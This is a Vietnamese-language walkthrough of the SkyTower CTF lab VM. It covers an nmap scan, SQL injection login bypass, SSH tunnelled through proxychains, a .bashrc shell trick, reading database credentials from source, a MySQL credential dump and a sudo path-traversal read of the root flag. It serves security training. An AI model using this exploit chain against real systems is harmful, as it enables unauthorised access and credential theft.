CEHack Skytower (Thử thách OSCP Like, CEH Master, CPENT)
CEHack Skytower (Thử thách OSCP Like, CEH Master, CPENT)
Xin chào tất cả mọi người. Hôm nay chúng ta sẽ vượt qua thử thách CTF trên skytower. CTF này được Telspace Systems thiết kế cho CTF tại Hội nghị thượng đỉnh về bảo mật ITWeb và BSidesCPT (Cape Town). Mục đích là để kiểm tra những người đam mê bảo mật từ trung cấp đến cao cấp về khả năng tấn công hệ thống bằng cách sử dụng phương pháp tiếp cận nhiều mặt và giành được “cờ”. Đây cũng là mô hình CTF được đề cập dành cho luyện tập OSCP, CPENT, LPT …
Cấp độ: Trung bình
Mục đích: tìm flag.txt trong PC của nạn nhân và lấy mật khẩu gốc.
Vậy thì tấn công thôi !
Tải xuống phòng thí nghiệm skytower từ đây .
Sau khi tải xuống, chúng ta hãy chạy lệnh netdetect trên thiết bị đầu cuối của mình để tìm ra địa chỉ IP. Bằng phương pháp này, chúng tôi phát hiện ra rằng địa chỉ IP của phòng thí nghiệm virtual-labs dễ bị tấn công là 192.168.1.123 vì tôi đang chạy nó trên mạng cục bộ.
Bây giờ, hãy chuyển sang liệt kê theo ngữ cảnh để xác định các dịch vụ đang chạy và mở máy của nạn nhân bằng cách sử dụng công cụ phổ biến nhất Nmap.
nmap -A 192.168.1.123Bằng cách quét này, chúng tôi thấy rằng cổng 80 đang mở nên nó phải có một trang web được liên kết với cổng.
Ngoài ra còn có một cổng SSH và một cổng proxy nhưng trước tiên hãy tập trung vào trang web. Một biểu mẫu đăng nhập mở ra khi tôi nhập IP vào thanh địa chỉ của trình duyệt yêu cầu ID email và mật khẩu để đăng nhập.
Hãy thử bằng cách gõ:
Email: '*'
Password: '*'Wow ! Phương pháp tiêm SQL mù của chúng ta đã hoạt động ở đây và thông tin chi tiết về tài khoản SSH đã được cung cấp cho chúng tôi trên trang login.php.
Bây giờ, các bạn có thể đã thử kết nối với nó thông qua SSH bình thường nhưng vấn đề là SSH đã bị lọc. Và vì chúng ta đang thấy một proxy trên cổng 3128, hãy thử định tuyến kết nối SSH của chúng ta thông qua máy chủ proxy.
Nhập gedit /etc/proxychains.conf và thêm câu lệnh này vào cuối:
http 192.168.1.123 3128lưu và thoát tệp cấu hình. Trên cửa sổ terminal mới, hãy thử kết nối SSH qua proxy đó.
proxychains ssh john@192.168.1.123Như các bạn có thể thấy, nó ngay lập tức đóng kết nối khi chúng ta nhập tên người dùng là john và mật khẩu là hereisjohn.
Vì vậy, điều đó cho chúng tôi một ý tưởng rằng chúng tôi sẽ không nhận được vỏ. Hãy thử thêm /bin/bash chỉ với lệnh ssh
proxychains ssh john@192.168.1.123 /bin/bashThành công với thủ thuật này ! Hãy ghi nhớ — Bây giờ, hãy kiểm tra thư mục hiện tại và các thành phần trong đó bằng cách:
pwd
ls –laChúng ta có thể thấy một tệp bashrc. Có lẽ đây là tệp gây rắc rối trong việc cung cấp trình bao shell. Hãy xóa tệp này bằng cách:
rm .bashrc
Khi .bashrc không còn nữa, hãy thử SSH một lần nữa.
Hoàn hảo! Nó đã cho chúng tôi một lớp vỏ thích hợp. Hãy gõ sudo –l để kiểm tra danh sách sudoers nhưng như bạn có thể thấy, john không có trong danh sách sudoers. Và chúng tôi cũng không biết bất kỳ người dùng nào khác!
Hãy gõ netstat -antp và hy vọng có dịch vụ nào đó cho phép chúng ta tìm kiếm bất kỳ người dùng nào khác.
Cổng 3306 đang lắng nghe, điều đó có nghĩa là cơ sở dữ liệu MySQL chắc chắn sẽ có thông tin của một số người dùng khác!
Nhưng vấn đề là chúng tôi không có tên cơ sở dữ liệu và thông tin đăng nhập.
Hãy nhớ rằng chúng tôi có một lỗi SQL trên trang 192.168.1.123/login.php có thể nếu chúng tôi đọc mã nguồn của nó, chúng tôi có thể tìm thấy tên cơ sở dữ liệu và thông tin đăng nhập.
Hãy đọc nó bằng cách:
cat /var/www/login.phpChúng ta có thể thấy rằng tên cơ sở dữ liệu là “ SkyTech ”, cả tên người dùng và mật khẩu đều là “ root”.
Đăng nhập vào MySQL thông qua:
mysql –u root –p rootỞ đây, chúng tôi chạy:
show tables;
select * from login;cơ sở dữ liệu sau xuất hiện:
Vì vậy, hãy thử đăng nhập qua ssh với tư cách là người dùng Sara.
ssh sara@localhost -t /bin/shNhập mật khẩu là ihatethisjob
sudo -lBây giờ, chúng tôi có một danh sách rõ ràng về sudoer.
Cuối cùng chúng tôi có một thư mục không cần mật khẩu. Vì vậy, hãy thử kiểm tra nội dung trong thư mục /accounts.
hãy gõ
sudo ls /accounts/../../../rootVà một tệp có tên “ flag.txt ” xuất hiện!
sudo cat /accounts/../../../root/flag.txtđọc tệp flag.txt và chúng tôi lấy mật khẩu gốc!
Chúc mừng! Các bạn đã giải quyết được thử thách Skytower CTF!
Tác giả: Harshit Rajpal
